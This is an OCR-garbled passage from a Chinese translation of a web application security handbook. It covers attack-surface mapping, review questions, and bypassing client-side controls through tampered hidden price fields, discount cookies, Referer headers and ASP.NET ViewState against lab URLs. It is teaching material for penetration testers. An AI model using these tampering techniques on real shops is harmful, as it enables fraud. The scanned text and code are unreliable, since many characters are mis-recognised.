~ 各 | home 
* 国 icons 
~ 国 images ‘headers 上 了 render 


params| s 
| 二 











“response | request 


<h3><a href="/shop/browse">All</a> Edt: <a 
href="/shop/browse/books/">hooks</a> E&gt; 
AutoMating-eDat ing Burp</ h3><br> 
<h5>AutoMating-eDating Burp (£35) </h5>Run 
robots txt through thousands of online users at high 
9 9 shop Speed using methods including Siper, 
a 革 i es Ram, or even Pitchfork.<br><br> 
? 3 browse <in2ut type=button value="Back" 
onClick="document.1location.replacel'/shop');" 
class="btn"> 
~ 入 | Codec-l lacking_my-story 
c | Pentesting-Thailand-Edition 
c 高 | SQL-Injection-Again 
~ 入 | Security-Jokes-vol-3_Perl 
o- 国 WAHH_v2 
c (a clothing 





</div> 
</h-ml> 




















图 4-15 ”EIS 应 用 程序 暴 起 的 受 攻击 面 


/auth 目 录 包 含 验证 功能 。 为 此 ， 有 必要 仔细 检查 所 有 验证 功能 、 会 话 处 理 和 访问 控制 ,包括 
其 他 内 容 搜索 攻击 。 

在 /core 路 径 内 ， 站 点 状态 页 面 似乎 接受 由 管道 符 (| ) 分 隅 的 参数 构成 的 数组 。 除 传统 的 基 
于 输入 的 攻击 外 ， 还 可 以 对 source、 location 和 IP 这 些 值 实施 蛮 力 攻击 ， 以 揭示 有 关 半 其 他 用 户 
或 在 pageID 中 指定 的 页 面 的 详细 信息 。 另 外 ， 还 可 以 搜索 有 关 无 法 访问 的 资源 的 信息 ， 或 者 在 
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pageID 中 尝试 使 用 通配符 , 如 pageID=al1 或 pageID=*。 最 后 , 由 于 显示 的 pageID 值 中 包含 笠 
杠 ， 这 表示 应 用 程序 可 能 正 从 文件 系统 检索 资源 ， 因 而 可 以 对 其 实施 路 径 遍 历 攻 击 。 

/gb 路 径 包 含 该 站 点 的 留言 板 。 访 问 此 页 面 后 发 现 ， 这 是 一 个 由 管理 员 主 持 的 讨论 论坛 。 虽 
然 其 中 的 消息 由 管理 员 进 行 管 理 ， 但 却 采 用 了 登录 避 开 机 制 1ogin=true， 这 说 明 攻 击 者 可 以 学 
试 批准 恶意 消息 ( 以 实施 跨 站 点 脚本 攻击 )， 以 及 阅读 其 他 用 户 发 送 给 管理 员 的 私有 消息 。 

Ahome 路 径 似 乎 保存 的 是 经 过 验证 的 用 户 内 容 。 基 于 这 一 点 ， 攻 击 者 可 以 尝试 实施 水 平权 限 
提升 攻击 ， 以 访问 其 他 用 户 的 个 人 信息 ， 并 确保 在 每 个 页 面 实施 了 访问 控制 。 

快速 检查 后 发 现 ，/icons 和 /images 路 径 保存 的 是 静态 内 容 。 这 说 明 可 以 符 试 对 属于 第 三 方 软 
件 的 图 标 名 称 实施 蛮 力 攻击 ， 并 检查 这 些 目录 的 目录 索引 ， 但 不 必 做 过 多 淮 试 。 

pub 路径 的 /pub/media 和 Apubmuser 目 录 下 包含 的 是 REST 风 格 的 资源 。 这 说 明 可 以 针对 
/pub/user/11 中 的 数字 值 实施 蛋 力 攻击 , 以 查找 其 他 应 用 程序 用 户 的 个 人 资料 页 面 。 与 此 功能 类 似 
的 社交 网 络 功能 可 以 揭示 用 户 信 息 、 用 户 名 和 其 他 用 户 的 登录 状态 。 

/shop 路 径 中 包含 网 上 购物 站 点 和 大 量 URL。 但 是 , 这 些 UREL 的 结构 大 致 相 同 。 仅 查看 一 或 两 
个 URL, 攻击 者 就 可 以 确定 所 有 相关 的 受 攻击 面 。 购 物 过 程 中 可 能 包含 有 趣 的 逻辑 缺陷 ,攻击 者 
可 以 利用 这 些 缺 陷 获 得 未 授权 折扣 或 逃避 文 付 。 
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(1) 了解 应 用 程序 执行 的 核心 功能 和 使 用 的 主要 安全 机 制 。 











(2) 确定 通常 与 常见 漏洞 有 关 的 应 用 程序 功能 和 行为 特点 。 
(3) 在 公共 漏洞 数据 库 ( 如 www.osvdb.org ) 中 检查 任何 第 三 方 代码 ,以 确定 任何 已 知 问题 。 
(4) 制订 攻击 计划 ， 优 先 考 虑 最 可 能 包含 漏洞 的 功能 ， 以 及 最 严重 的 源 洞 。 








4.3 小结 


解析 应 用 程序 是 向 其 发 动 攻击 的 重要 前 提早 然 下 接 发 动 攻击 并 开始 探查 实际 源 洞 的 做 法 十 
分 具有 了 吸引 力 ， 但 详细 了 解 应 用 程序 的 功能 、 技 术 与 受 攻击 面 更 利于 后 面 的 攻击 。 

在 几乎 所 有 的 Web 应 用 程序 攻击 中 ， 在 采用 手动 拉 巧 的 同时 ,适当 采用 受 控 的 日 动 化 技巧 是 
最 有 效 的 攻击 手段 。 几乎 不 存在 任何 完全 目 动 化 的 工具 , 能 够 对 应 用 程序 进行 安全 、 彻 的 的 解析 。 
要 解 析 应 用 程序 , 渗透 测试 员 需 要 目 己 动手 并 利用 相关 经 验 。 本 章 讨论 的 核心 技术 包括 以 下 几 项 。 

口 手动 浏览 和 用 户 指 定 的 抓 取 ， 枚 举 应 用 程序 的 可 见 内 容 与 主要 功能 。 

口 使 用 查 力 结合 人 为 干预 和 百 沉 发 现 尽 可 能 多 的 隐藏 内 容 。 

口 对 应 用 程序 进行 智能 分 析 ， 确 定 其 关键 功能 、 行 为 、 安 全 机 制 与 技术 。 

口 评估 应 用 程序 的 受 攻击 面 ， 确 定 最 易 受 到 攻击 的 功能 和 行为 ， 对 其 执行 更 有 和 针对 性 的 探 

查 ， 以 发 现 可 供 利 用 的 源 洞 。 
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4.4 问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.net/wahh。 

(1) 当 解 析 一 个 应 用 程序 时 ， 会 遇 到 以 下 URL: 
https://wahh-app.com/CookieaAuth.dll?GetLogon?curl=zZ2Fdefault. 
aSPpX 

据 此 可 以 推论 出 服务 融 使 用 何 种 技术 ? 该 技术 的 运作 方式 可 能 是 怎样 的 ? 
(2) 如 末 所 针对 的 应 用 程序 是 一 个 Web 论 坛 ， 并 且 只 发 现 了 一 个 URL: 
http://wahh-app.com/forums/ucp.php?mode=register 

如 何 通 过 它 获得 论坛 成 员 列 表 ? 

(3) 当 解 析 一 个 应 用 程序 时 ， 直 到 以 下 URL: 


https://wahh-app.com/public/profile/Address. 
AasSp?action=view&location 
=detault 


据 此 推断 服务 器 端 应 使 用 何 种 技术 。 可 能 还 存在 哪些 其 他 内 容 和 功能 ? 

(4) Web 服 务 右 的 一 个 啊 应 包含 以 下 消 居 头 : 

Server: Apache-Coyote/l1.1 

这 表示 服务 如 使 用 何 种 技术 ? 

(5) 假设 正在 解析 两 个 不 同 的 Web 应 用 程序 ， 在 每 个 应 用 程序 中 请 求 URL/agqmin .cpf。 每 个 
请 求 返 回 的 啊 应 消息 头 如 下 所 示 。 仅 由 这 些 消息 头 能 否 确定 每 个 应 用 程序 中 存在 所 请 求 的 资源 ? 

HTTP/1.1] 200 OK 

Server: Microsoft-IIS/5.0 

Explires: Mon, 20 Jun 2011 14:59:21 GMT 

Content-Location: http://wahh- 

app.com/includes/error.htm?404;http://wahh-app.com/admin. cpf 

Date: Mon, 20 Jun 2011 14:59:21 GMT 

Content-Type: text/html 

Accept-Ranges: bytes 

Content-Length: 2117 




















HTTP/1.1] 401 Unauthorized 

Server: Apache-Coyote/l1l.1 

WHW-Authenticate: Basic realm="Wahh Administration Site" 
Content-Type: text/html;charset=utf-8 

Content-Length: 954 

Date: Mon, 20 Jun 2011 15:07:27 GMT 
Connection: close 








避 开 客 户 端 控件 





第 1 音 中 ,我 们 提 到 ， 由 于 客户 端 可 提交 任意 输入 ，Web 应 用 程序 的 核心 安全 因此 受到 

士 成 肋 。 尽管 如 此 ， 大 部 分 的 Web 应 用 程序 仍然 依靠 在 客户 端 执行 各 种 措施 ， 对 它 提交 

给 服务 器 的 数据 进行 控制 。 通 党 ,这 种 做 法 造成 一 个 基本 的 安全 缺陷 : 用 户 能 够 完全 控制 客户 端 
和 由 其 提交 的 数据 ， 并 可 以 避 开 任何 在 客户 端 执 行 但 服务 器 并 不 采用 的 控件 。 

应 用 程序 依靠 客户 端 控件 限制 用 户 输入 表现 在 两 个 方面 : 首先 , 应 用 程序 可 通过 客户 端 组 件 ， 
使 用 某 种 它 认为 可 防止 用 户 修改 的 机 制 传送 数据 。 其次， 应 用 程序 可 在 客户 端 执行 保护 措施 , 控 
制 用 户 与 其 客户 端的 交互 ， 从 而 对 功能 实施 限制 ， 并 (或 ) 在 提交 用 户 输入 之 前 对 这 些 输入 进行 
控制 。 我 们 可 通过 使 用 HTML 表 单 功能 、 客 户 端 脚本 或 浏览 器 扩展 技术 实现 这 种 控制 。 

我 们 将 在 本 章 中 举例 说 明 各 种 客户 端 控件 并 分 析 避 开 这 些 控件 的 方法 。 


5.1 通过 客 忆 站 传送 效 据 


应 用 程序 通常 以 终端 用 户 无 法 直接 查看 或 修改 的 方式 向 客户 端 传送 数据 , 希望 客户 端 在 随后 
的 请 求 中 将 这 些 数据 送 回 服务 器 。 通常 ,应 用 程序 的 开发 者 简单 地 认为 所 采用 的 传输 机 制 将 确保 
通过 客户 端 传 送 的 数据 在 传送 过 程 中 不 会 遭 到 修改 。 
由 于 客户 端 向 服务 器 传 送 的 一 切 内 容 都 完全 处 于 用 户 的 控制 范围 内 , 认为 通过 客户 端 传送 的 
数据 不 会 被 修改 ， 这 种 看 法 往往 是 错误 的 ， 并 致使 应 用 程序 易于 遭受 一 种 或 几 种 攻击 。 
你 肯定 想 知 道 这 其 中 的 原因 。 如 果 一 个 特殊 的 数据 已 知 , 并 由 服务 器 指定 ， 则 应 用 程序 需要 
向 客户 端 提 交 这 个 值 ， 然 后 读 取 回 该 值 。 实 际 上 ， 对 开发 者 而 言 ， 以 这 种 方式 编写 应 用 程序 往往 
更 加 人 简单， 原因 如 下 。 
口 这 样 做 不 必 追 踊 用 户 会 话 中 的 各 种 数据 。 减 少 每 次 会 话 保 存在 服务 器 上 的 数据 量 ， 同 时 
还 能 提高 应 用 程序 的 性 能 。 
口 如 果 将 应 用 程序 部 署 到 几 台 不 同 的 服务 器 上 ， 那 么 ， 在 执行 多 级 操作 时 ， 用 户 可 能 需要 
与 多 台 服 务 需 进行 交互 ， 这 时 在 处 理 相同 用 户 请 求 的 主机 之 间 共 享 服务 器 端 数 据 就 会 遇 
到 困难 。 那 么 ,使 用 客户 端 传送 数据 就 成 为 解决 这 个 问题 的 一 个 顾 具 吸引 力 的 方案 。 
口 如 果 应 用 程序 在 服务 器 上 采用 任何 第 三 方 组 件 ， 如 购物 车 ， 则 可 能 很 难 或 无 法 修改 这 些 
组 件 ， 因 此 ， 通 过 客户 端 传输 数据 就 成 为 集成 这 些 组 件 的 最 简单 方式 。 
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口 在 茶 些 情况 下 ， 跟 踪 服 务 胡 上 的 新 数据 可 能 震 要 更 新 核心 服务 大 病 API， 因 而 会 触发 正式 
的 变更 管理 流程 和 回归 测试 。 这 时 ， 实 施 包含 客户 病 数 据 传输 的 更 加 细 化 的 解决 方案 可 
以 避 倪 这 种 情况 ， 从 而 满足 罕 竣 的 完工 期 限 要 求 。 

但 是 ， 以 这 种 方式 传送 敏感 数据 通常 并 不 安全 ， 并 且 会 在 应 用 程序 中 造成 大 量 源 洞 。 


5.1.1 隐藏 表单 字段 


隐藏 HTML 表 单子 段 是 一 种 表面 看 似 无 法 修改 ,通过 客户 并 传送 数据 的 第 用 机 制 。 如 来 一 个 
表单 标记 为 隐藏 ， 它 就 不 会 显示 在 屏 者 上 。 但 是 , 用户 提交 表单 时 ， 保 存在 表单 中 的 字段 名 称 和 
值 仍 人 彼 送 交 给 应 用 程序 。 

在 隐 藏 表 捍 字段 中 保存 产品 价格 的 零 售 应 用 程序 就 是 存在 这 种 安全 缺陷 的 典型 示例 。 在 Web 
应 用 程序 发 展 的 早期 阶段 ， 这 种 漏洞 极其 普 过 ， 现 在 也 绝 没有 消失 。 典 型 的 表单 如 图 $-1 所 示 。 


Please enter the requlred quantity: 












































Product: iPhone Ultimate 


(Maximum quantity is 50) 





图 5-1 典型 的 HTML 表 单 


创建 这 个 表单 的 代码 如 下 : 

<form method="post" action='"Shop.aspx?prod=1'"> 

Product: iPhone 5 <br/> 

Price: 449 <br/> 

Quantity: <input type="text" name="gquantity"> {Maximum gquantity is S50) 





<br/> 











<input type="hidden" name="price" value="449"> 





<input type="submit" value="Buy"> 
</form> 
注意 ， 表 单字 段 名 为 price， 其 被 标记 为 隐 泌 。 用 户 提 区 表单 时 ， 这 个 字段 将 被 送 交 给 服务 需 : 
POST /shop/28/Shop.aspx?prod=1 HTTP/1.1 
Host: mdsec.net 














Content-Type: application/x-www-form-urlencoded 
Content-Length: 20 


Guantity=1&price=449 


尝试 访问 


http://mdsec.net/shop/28/ 











现在 ， 虽 然 price 字 段 并 未 显示 在 屏幕 上 ,用 户 无 法 对 其 进行 编辑 ,但 这 只 是 因为 应 用 程序 
指示 浏览 锅 隐 藏 该 字段 而 已 。 因 为 在 客户 桨 进行 的 一 切 操作 最 终 将 由 用 户 控制 , 用 户 需 要 编辑 价 
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格 时 就 可 解除 这 个 限制 。 

要 实现 编辑 操作 ， 一 种 方法 是 保存 HTML 页 面 的 源 代 码 ， 编 辑 字段 的 值 ， 然 后 将 源 代 三重 新 
载 和 浏览 禹 ， 并 单 击 Buy 按 钮 。 但 是 ,使 用 拦截 代理 服务 髓 〈intercepting proxy ) 对 数据 进行 动态 
修改 更 加 简单 方便 。 

在 攻击 Web 应 用 程序 时 ， 拦 规 代 理 服 务 需 极其 有 用 ， 它 是 一 种 不 可 或 缺 的 工具 。 我 们 可 以 找 
到 大 量 拦截 代理 服务 需 工 具 ， 本 书 使 用 其 中 一 位 作者 编写 的 Burp Proxy 工 具 。 

代理 服务 右 位 于 Web 浏 览 颖 和 目标 应 用 程序 之 则 。 它 拦截 应 用 程序 发 布 和 收 到 的 每 一 个 
HTTP 或 HTTPS 请 求 和 啊 应 。 用 户 可 通过 它 拦截 任何 消息 ， 对 其 进行 检查 或 修改 。 如 采 之 前 从 未 
用 过 拦截 代理 服务 希 , 请 参阅 第 20 音 了 解 有 关 拦 截 代 理 服 务 需 的 运行 机 制 ， 如 何 配置 和 使 用 拦截 
代理 服务 需 的 详细 信息 。 

安装 拦截 代理 服务 融 并 进行 相应 配置 后 就 可 以 拦截 提交 表单 的 请 求 ,， 随意 修改 price 字 段 的 
值 ， 如 图 5-2 所 示 。 

















Rt > ER 
Yburpsuiteprofessional [J 


burp intruder repeater window help 





proxy | spider | scanner | intruder | repeater | sequencer | decoder | comparer | options | alerts | 


"intercept | options | history 





requestto http:///mdsec.net80 {172.16.50.129] 


nar] [an | | 
“ raw | params | headers | hex | viewstate | 


POST /shop/28/Shop.aspx?prod=1 HTTP/1.1 

Host: mdsec.net 

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) Gecko/201J0722 
Firefox/3.6.8 

Accept: text/html,application/xhtml+xml,application/xml;d=0.9,*/*;d=0.8 
Accept-Language: en-gh,en;d=0.5 

Accept-Encoding: gzip,deflate 








Accept-Charset: 1SO-8859-1,utf-B8;q=0.7,*;dq=0.7 
Keep-Alive: 115 
Proxy-Connection: keep-alive 


Referer: http://mdsec.net/shop/28/Shop.aspx?proc=1 
Content—-Type: application/x—-www-form-urlencoded 
Content-Length: 20 


cuantity=1éprice=449 











Ll, liz) | 














图 5-2 ”使 用 拦截 代理 服务 器 修改 隐藏 表单 字段 的 值 
如 果 应 用 程序 根据 表单 提交 的 价格 处 理 交 易 ， 就 能 够 以 选择 的 任何 价格 购 灭 该 产品 。 








提示 “如果 发 现 应 用 程序 易于 受到 这 种 攻击 ， 看 看 是 否 可 以 提交 一 个 负数 价格 值 。 有 
些 时 候 ， 应 用 程序 居然 接受 使 用 负数 价格 值 的 交易 。 攻 击 者 不 仅 收 到 订购 的 货物 ， 信 


用 卡 还 会 收 到 退 款 一 种 两 面 得 利 的 情况 (如 果 出 现 这 种 情况 的 话 )。 
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5.1.2 HTITP cookie 


HTTP cookie 是 通过 客户 问 传 送 数 据 的 男 一 种 常用 机 制 。 和 隐藏 表单 字段 一 样 ，HTTP cookie 
一 般 并 不 显示 在 屏幕 上 上， 也 不 可 由 用 户 直 接 修改 。 当 然 , 用 户 可 使 用 拦截 代理 服务 硕 ， 通 过 更 改 
设置 cookie 的 服务 器 响应 或 随后 发 布 这 些 cookie 的 客户 端 请 求 ， 对 HTTP cookie 进 行 修改 。 

下 面 以 前 面 的 示例 〈 稍 作 修 改 ) 为 例 进行 说 明 。 消 费 者 登录 应 用 程序 后 ， 收 到 以 下 啊 应 : 

HTTP/1.1] 200 OK 


Set-Cookie: DiscountAgreed=25 
Content-Length: 1530 














DiscountAgreed cookie 是 依靠 客户 端 控件 ( 基于 cookie 一 般 无 法 被 修改 这 个 事实 ) 保护 通 
过 客户 并 传 送 的 数据 的 典型 示例 。 如 果 应 用 程序 信任 DiscountAgreeqd cookie 返 回 给 服务 硕 的 
值 ， 那 么 消费 者 修改 这 个 值 就 可 获得 任意 折扣 。 例 如 : 


POST /shop/92/Shop.aspx?prod=3 HTTP/1.1 
Host: mdsec.net 








Cookie: DiscountAgreed=25 
Content-Length: 10 


quantity=1 


尝试 访问 





http://mdsec.net/shop/92/ 


5.1.3 URL 参数 





应 用 程序 和 常常 使 用 预先 设 定 的 URL 参 数 通过 客户 问 传 送 数 据 。 例 如 ， 用 户 浏览 产品 目录 时 ， 
应 用 程序 会 回 他 们 提供 指 回 下 列 UREL 的 超 链 接 : 

http://mdsec.net/shop/?prod=3&pricecode=32 

如 果 包 含 参 数 的 URL 显 示 在 浏览 右 的 地 址 栏 中 , 任何 用 户 不 需要 使 用 工具 就 可 任意 修改 其 中 
的 参数 。 但 是 ， 在 许多 情况 下 ， 应 用 程序 并 不 希望 普通 用 户 查 看 或 修改 URL 参 数 。 例 如 : 

口 使 用 包含 参数 的 URL 加 载 能 入 图 像 时 ; 

口 使 用 包含 参数 的 URL 加 载 框架 内 容 时 ; 

口 表单 使 用 PosT 方 法 并 且 其 目标 URL 包 含 预先 设 定 的 参数 时 ; 

口 应 用 程序 使 用 弹出 窗口 或 其 他 方法 隐藏 浏览 硕 地 址 栏 时 。 

当然 ， 如 前 所 述 ， 我 们 可 以 使 用 拦截 代理 服务 器 修改 上 面 的 任何 URL 参 数 。 























5.1.4 Referezr 消 息 头 


浏览 硕 在 大 多 数 HTTP 请 求 中 使 用 Referez 消 息 头 。 浏 览 希 使 用 这 个 消息 头 指示 提出 当前 请 
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求 的 页 面 的 URL 一 一 或 者 是 因为 用 户 单 击 了 一 个 超 链接 或 提交 了 一 个 表单 ,或 者 是 因为 该 页 面 引 
用 了 其 他 欣 源 〈 如 图 像 ) 因此 ， 我 们 可 以 利用 这 个 消息 头 通过 客户 闯 传 送 数 据 ， 这 是 因 为 应 用 
程序 处 理 的 URL 受 其 控制 , 开发 者 认为 Referer 消 奶头 可 用 于 准确 判断 某 个 特殊 的 请 求 由 哪个 URL 
生成 。 

以 帮助 筷 记 密码 的 用 户 重 新 设置 密码 的 机 制 为 例 。 应 用 程序 要 求 用 户 按 规 定 的 顺序 完成 几 个 
步 又， 然后 再 通过 以 下 请 求 重 新 设置 密码 人 : 

GET /auth/472/CreateUser.ashx HTTP/1.1 


Host: mdsec.net 
Referer: https://mdsec.net/auth/472/Admin.ashx 


应 用 程序 可 以 使 用 Referezr 消 息 头 证 实 这 个 请 求 是 在 正确 的 阶段 (Admin.ashx ) 提出 的 ， 
然后 才 人 允许 用 户 访问 请 求 的 功能 。 

但 是 ,因为 用 户 控 制 着 每 一 个 请 求 , 包括 HTTP 消 息 头 ,他 可 以 直接 进入 CreateUser .ashx， 
并 使 用 拦 蕉 代理 服务 硕 将 Referer 消 息 头 的 值 修改 为 应 用 程序 需要 的 值 ， 从 而 轻 兄 避 开 这 种 
控制 。 

实际 上 ， 根 据 w3.org 标 准 ，Referezr 消 息 头 完全 是 可 选 的 。 因 此 ， 虽 然 大 多 数 浏 览 硕 执 行 这 
个 消息 头 ， 但 是 ， 使 用 它 控 制 应 用 程序 的 功能 应 被 视 为 是 一 种 “陈腐 ”的 做 法 。 






































尝试 访问 
http://mdsec.net/auth/472/ 





© 错误 观点 ”不知 何 故 ， 相 比 于 请 求 的 其 他 部 分 (如 URL )， 人 们 常常 认为 HTTP 消 息 关 
具有 更 强 的 “ 防 自 改 ”能 力 。 这 会 导致 开发 者 实施 信任 由 Cookie 和 Referer 消 息 头 提交 


的 值 的 功能 ， 而 对 其 他 数据 ( 如 URL 参 数 ) 执行 严格 的 确认 。 这 种 认识 是 错误 的 一 一 


因为 任何 业余 黑客 在 攻击 应 用 程序 时 都 可 以 使 用 大 量 免 费 的 拦截 代理 服务 器 工具 轻松 
修改 所 有 请 求 数据 。 打 个 比方 ， 假 如 老师 准备 搜查 你 的 书 划 ， 你 觉得 把 水 枪 藏 在 抽 层 
底下 会 更 加 安全 ， 因 为 她 需要 谊 下 腰 才 能 发 现 它 。 





渗透 测试 步 又 








(1) 在 应 用 程序 中 , 确定 隐藏 表单 字段 、cookie 和 URIL 参 数 明显 用 于 通过 客户 端 传送 数据 的 





任何 情况 。 

(2) 根据 数据 出 现 的 位 置 以 及 参数 名 称 之 类 的 线索 ,确定 或 猪 测 它 在 应 用 程序 逻辑 中 发 挥 
的 作用 。 

(3) 修改 数据 在 应 用 程序 相关 功能 中 的 值 。 确定 应 用 程序 是 否 处 理 在 参数 中 提交 的 任意 值 ， 
以 及 这 样 做 是 否 会 叶 任 应 用 程序 易于 遭 受 任何 攻击 。 
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5.1.5 ”模糊 数据 


有 时 候 ， 通 过 客户 端 传送 的 数据 被 加 密 或 进行 了 某 种 形式 的 模糊 处 理 ， 因 而 变 得 具 次 难民 。 
例如 ， 下 面 的 产品 价格 并 不 保存 在 隐藏 字 段 中 ， 而 是 以 隐 舍 值 (crytic value ) 的 形式 传送 。 

<form method="post" action="Shop.aspx?prod=4"> 

Product: Nokia Infinity <br/> 

Price:; 699 <br/> 

Quantity: <input type='"text" name="'quantity"> (Maximum quantity is 50) 

<br/> 

<input type="hidden" name='"price" value="699"»> 

<input type="hidden" name="pricing token" 

value="BE76D213D291B8F216D694A34383150265C989229"> 


<input type="submit" value="Buy'"> 





</form> 
如 末 发 现 这 种 情况 , 可 以 据 此 推 朵 ,提交 表单 后 ,服务 硕 端 应 用 程序 将 检查 模糊 字符 串 的 完 
整 性 ,或 对 其 进行 解密 或 去 模糊 处 理 ， 然 后 处 理 它 的 明文 值 。 这 种 次 层次 处 理 可 能 易于 造成 各 种 


























漏洞 ; 但 是 ， 要 探查 或 利用 这 种 源 洞 ， 首 先 必须 对 有 效 载 集 进行 适当 的 人 处理 。 





尝试 访问 


http://mdsec.net/shop/48/ 


注解 ”应 用 程序 的 会 话 处 理 机 制 通 常 通过 客户 端 传送 模糊 数据 。 在 HTTP cookie 中 传 
送 的 会 话 令 牌 、 在 隐藏 字段 中 传送 的 反 CSRE 令 牌 ， 以 及 用 于 访问 应 用 程序 资源 的 一 次 
性 URE 令 牌 ， 全 都 是 在 客户 端 自 改 的 潜在 目标 。 我 们 将 在 第 7 章 详细 讨论 针对 这 些 令 牌 


的 注意 事项 。 





渗透 测试 步骤 

有 儿 种 方法 可 以 对 通过 客户 端 传送 的 模糊 数据 实施 攻击 。 

(1) 如 果 知 道 模 糊 字 符 串 的 明文 值 ， 可 以 和 尝试 破译 模糊 处 理 所 使 用 的 模糊 算法 。 

(2) 如 第 4 草 所 述 ， 应 用 程序 的 其 他 地 方 可 能 包含 一 些 功能 ， 攻 击 者 可 以 利用 它们 返回 由 
目 己 控制 的 一 段 明 文生 成 的 模糊 字符 串 。 在 这 种 情况 下 , 攻击 者 可 以 向 目标 功能 生 接 提交 任意 
一 个 有 效 载 集 ， 获 得 所 需要 的 字符 串 。 

(3) 即使 模糊 字符 串 完全 无 法 理解 ， 也 可 以 在 其 他 情况 下 重新 传送 它 的 值 ， 实 现 某 种 恶意 
效果 。 例 如 ， 前 面 显示 的 表单 的 pricing_token 参 数 中 可 能 包含 一 个 加 密 的 产品 价格 。 尺 管 
攻击 者 无 法 对 选择 的 任意 价格 以 相同 的 算法 进行 加 密 , 但 是 , 他 们 可 以 把 另 一 个 更 加 便宜 的 产 
品 的 加 密 价 格 复制 过 来 ， 放 在 这 里 提交 。 

(4) 如 末 其 他 所 有 方法 全 者 无效 ， 还 可 以 通过 提交 了 畸形 字符 串 一 一 如 包含 超 长 仁 、 不 同 字 
符 集 等 错误 的 字符 串 一 一 答 试 攻击 负责 对 模糊 数据 进行 解密 或 去 模糊 处 理 的 服务 硕 问 逻辑 。 
































5.1.6 ASP.NET ViewState 


ASP.NETViewState 是 一 种 通过 客户 端 传送 模糊 数据 的 第 用 机 制 ,。 它 是 一 个 由 所 有 ASPNET 
Web 应 用 程序 默认 创建 的 隐藏 字段 ， 其 中 包含 关于 当前 页 面 状 态 的 序列 化 信息 。ASPNET 平 台 使 
用 viewstate 提 高 服务 器 的 性 能 一 一 服务 融通 过 它 在 连续 提交 请 求 的 过 程 中 保存 用 户 界 面 中 的 
元 素 ， 而 不 需要 在 服务 器 端 维护 所 有 相关 的 状态 信息 。 例 如 ， 服务 器 会 根据 用 户 提交 的 参数 填充 
下 拉 列 表 。 用 户 随后 提交 请 求 时 ， 浏 览 需 并 不 回 服 务 需 提交 列表 的 内 容 。 相 反 ,， 浏 览 吉 提交 隐藏 
的 ViewSstate 字 段 ， 其 中 包含 该 列表 的 序列 化 格式 。 然 后 ， 服 务 需 对 Viewstate 进 行 去 序列 化 
处 理 ， 并 重新 建立 相同 的 列表 ， 再 将 其 返回 给 用 户 。 

除 这 种 核心 功能 外 ,开发 者 还 在 连续 提交 请 求 的 过 程 中 使 用 viewstate 保 存 任意 信息 。 例 如 ， 
应 用 程序 可 以 不 将 产品 价格 保存 在 隐藏 表单 字段 中 ， 而 是 将 其 保存 在 viewSstate 中 ， 如 下 所 示 : 


string price = getPrice {prodno}): 






































ViewState.Add ("price'", price}): 





返回 给 用 户 的 表单 如 下 所 示 : 
<form method= "post" action="Shop.aspx?prod=3"> 
<input type="hidden" name=" VIEWSTATE" id=" VIEWSTATE" 
value="/wEPDWULLTEI1IODCXNJKWNjJ IPFg9IEeBXBYaWN1BOMZOT1kZA==" /> 


Product: HTC Avalanche <br/> 

Price: 399 <br/> 

Quantity: <input type="text" name="quantity"> (Maximum quantity is 50) 
<br/> 

<input type="submit" value="Buy'"> 


</ form> 
当 用 户 提 交 表 单 时 ， 浏 览 磊 将 发 送 以 下 请 求 : 
POST /shop/i716/Shop.aspx?prod=3 HTTP/1.1 


Host: mdsec.net 





Content-Type: application/x-—-www-form-urlencoded 
Content-Length: 77 


VIEWSTRATE= 务 2FwWEPEDWULLTE1ODcxN]JKwN]IPEGIeEXBYanN1LBOMZOT1TKZ7A 务 3D 和 3D& 
Guantity=1 


很 明显 ， 上 面 的 请 求 中 并 不 包含 产品 价格 一 一 只 有 订购 的 数量 和 模糊 处 理 后 的 Viewstate 
参数 。 随 意 更 改 这 个 参数 会 导致 应 用 程序 显示 错误 消息 ， 并 因此 终止 购买 交易 。 

ViewState 参 数 实际 上 是 一 个 Base64 编 码 字 符 串 ,用 户 可 以 轻松 对 这 个 字符 串 进 行 解码 ， 以 
查看 其 代表 的 价格 参数 ， 如 下 所 未 : 

3D FF 01 OF OF 05 0B 2D 31 35 38 37 31 36 39 30 ; -$Y..... -15871690 


36 32 DOF 16 02 1lE O05 70 72 69 63 65 05 03 33 39 ; 62..... price..39 
39 64 64 9dd 
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提示 “在 对 一 个 可 能 为 Base64 编 码 的 字符 串 进 行 解码 时 ， 用 户 常常 会 犯 一 个 错误 ， 即 
JW | 从 字符 串 的 错误 位 置 开 始 解码 。 鉴 于 Base64 编 码 的 特点 ， 如 果 从 错误 的 位 置 开 始 解码 ， 


解码 后 的 字符 串 中 会 出 现 乱 码 。Base64 采 用 基于 数据 块 的 格式 ， 每 4 字 节 的 编码 数据 解 


码 后 会 变 为 3 个 字 节 。 因 此 ， 如 果 解 码 后 的 Base64 字 符 串 并 无 意义 ， 请 尝试 从 编码 字符 
串 中 的 4 个 相 邻 的 偏 移 值 位置 开 始 解码 。 





默认 情况 下 ，ASPNET 平 台 通过 在 viewState 中 加 入 一 个 密 钥 散 列 〈 称 为 MAC 保 护 ) 来 
防止 算 改 。 但 是 ,一 些 应 用 程序 禁用 了 这 项 默认 启用 的 保护 ， 这 章 味 着 攻击 人 员 可 以 修改 
ViewSstate 的 值 ， 以 确定 其 是 否 会 对 应 用 程序 的 服务 融 端 处 理 产 生 影 啊 。 

Burp Proxy 提 供 一 个 指示 Viewstate 是 和 否 受 MAC 保 护 的 viewSstate 解 析 器 ， 如 网 5-3 所 示 。 
如 采 ViewState 未 受到 保护 ， 则 攻击 人 员 可 以 使 用 viewState 树 下 的 十 六 进 制 编辑 硕 在 Burp 中 
编辑 ViewState 的 内 容 。 在 回 服 务 需 或 客户 端 发 送 消 息 时 ，Burp 将 发 送 经 过 更 新 的 ViewState， 
具体 到 前 面 的 示例 ， 这 样 就 可 以 更 改 购物 时 商品 的 价格 。 

[re ee < 


target | proxy spider | scanner | intruder repeater | sequencer 


intercept | options | history | 











| decoder | comparer | options | alerts | 











requestto http://mdsec.net80 {172.16.50.129] 





| forward || drop | | intercept is on | | action 








| raw | params | headers | hex | viewstate | 

















9- ViewState v2.0 compatible [MAC is not enabled] 
9?- Pair 
9?- Pair 
string -1587169062 
9?- Pair 
¢— List 
string price 
string B99| 
null 
null 
4 1»| 
0 [Wm lo lo lo 5 lo |2d Bf B5 Be fa7 Bt B6 fe Bo [36 hh -158716906 
1 |32 Of 15 02 1e 05 |70 |z2 69 63 |65 |I05 |03 |33 |39 |39 2 price 399 
2 64 |64 上 上 上 FFHFHFHFFHHFFFHHFF le 


























